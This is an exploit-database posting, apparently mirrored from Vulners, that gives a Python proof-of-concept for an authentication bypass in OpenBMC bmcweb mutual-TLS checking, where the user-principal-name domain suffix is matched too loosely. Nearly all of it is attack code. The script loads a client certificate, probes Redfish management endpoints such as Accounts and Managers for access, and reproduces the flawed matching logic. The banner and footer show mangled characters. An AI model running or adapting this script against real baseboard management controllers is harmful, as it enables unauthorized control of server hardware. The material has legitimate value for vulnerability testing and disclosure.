==================================================================================================================================
| # Title : OpenBMC bmcweb AUTH-F6 mTLS UPN Suffix Authentication bypass via parent-domain certificate |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://github.com/openbmc |
==================================================================================================================================
[+] Summary : a Python PoC-style security test script for OpenBMC mTLS authentication issue labeled βAUTH-F6 UPN suffix bypassβ.
[+] POC :
#!/usr/bin/env python3
import argparse
import ssl
import sys
import requests
import urllib3
from urllib.parse import urljoin
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BMCWebAuthBypass:
def __init__(self, target, port=443, use_ssl=True, verbose=False):
self.target = target
self.port = port
self.use_ssl = use_ssl
self.verbose = verbose
self.base_url = f"{'https' if use_ssl else 'http'}://{target}:{port}"
self.session = requests.Session()
self.session.verify = False
def log(self, msg, level="INFO"):
colors = {
"SUCCESS": "\033[92m[+]\033[0m",
"ERROR": "\033[91m[-]\033[0m",
"WARNING": "\033[93m[!]\033[0m",
"INFO": "\033[96m[*]\033[0m"
}
print(f"{colors.get(level, '[*]')} {msg}")
def setup_mtls(self, cert_file, key_file):
"""Setup mTLS with client certificate"""
try:
self.session.cert = (cert_file, key_file)
self.log(f"Loaded client certificate from {cert_file}", "SUCCESS")
return True
except Exception as e:
self.log(f"Failed to load certificate: {e}", "ERROR")
return False
def test_authentication(self):
"""Test if authentication succeeds with the certificate"""
endpoints = [
'/redfish/v1/Systems',
'/redfish/v1/Managers',
'/redfish/v1/SessionService/Sessions',
'/redfish/v1/Chassis',
'/redfish/v1/AccountService/Accounts'
]
for endpoint in endpoints:
url = urljoin(self.base_url, endpoint)
self.log(f"Testing access to {url}")
try:
response = self.session.get(url, timeout=10)
if response.status_code == 200:
self.log(f"SUCCESS! Access granted to {endpoint}", "SUCCESS")
try:
data = response.json()
self.log(f"Response data: {list(data.keys()) if data else 'empty'}")
except:
pass
return True
elif response.status_code == 401:
self.log(f"Access denied to {endpoint} (HTTP 401)")
else:
self.log(f"Response: HTTP {response.status_code}")
except Exception as e:
self.log(f"Error: {e}", "WARNING")
return False
def check_upn_matching(self, upn_email, target_domain=None):
"""Check if UPN matches target domain (vulnerable algorithm)"""
if not target_domain:
target_domain = self.target
if '@' not in upn_email:
self.log(f"Invalid UPN format: {upn_email}", "ERROR")
return False
user_part, upn_domain = upn_email.split('@')
upn_labels = upn_domain.split('.')
target_labels = target_domain.split('.')
self.log(f"UPN domain: {upn_domain}")
self.log(f"Target domain: {target_domain}")
upn_idx = len(upn_labels) - 1
target_idx = len(target_labels) - 1
matching = True
while upn_idx >= 0 and target_idx >= 0:
if upn_labels[upn_idx] != target_labels[target_idx]:
matching = False
break
upn_idx -= 1
target_idx -= 1
result = matching or upn_idx < 0
self.log(f"Vulnerable algorithm result: {result}")
if result:
self.log("Certificate would authenticate for this domain (VULNERABLE)", "WARNING")
else:
self.log("Certificate would NOT authenticate (safe)")
return result
def run(self, cert_file=None, key_file=None, upn_email=None):
"""Main exploit routine"""
self.log(f"Target: {self.base_url}")
if cert_file and key_file:
if not self.setup_mtls(cert_file, key_file):
return False
if self.test_authentication():
self.log("Authentication bypass successful!", "SUCCESS")
return True
else:
self.log("Authentication failed", "ERROR")
elif upn_email:
self.check_upn_matching(upn_email)
return True
else:
self.log("No certificate or UPN provided", "ERROR")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS Bypass"
)
parser.add_argument("-t", "--target", required=True, help="Target BMC hostname")
parser.add_argument("-p", "--port", type=int, default=443, help="Port (default: 443)")
parser.add_argument("--cert", help="Client certificate file (PEM)")
parser.add_argument("--key", help="Client key file (PEM)")
parser.add_argument("--upn", help="UPN email to test (e.g., user@com)")
parser.add_argument("--target-domain", help="Target domain for UPN test")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
args = parser.parse_args()
print("""
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CVE-2026-XXXXX - bmcweb OpenBMC AUTH-F6 mTLS UPN Bypass β
β Authentication Bypass via Parent-Domain Certificate β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
""")
exploit = BMCWebAuthBypass(
target=args.target,
port=args.port,
verbose=args.verbose
)
success = exploit.run(
cert_file=args.cert,
key_file=args.key,
upn_email=args.upn
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation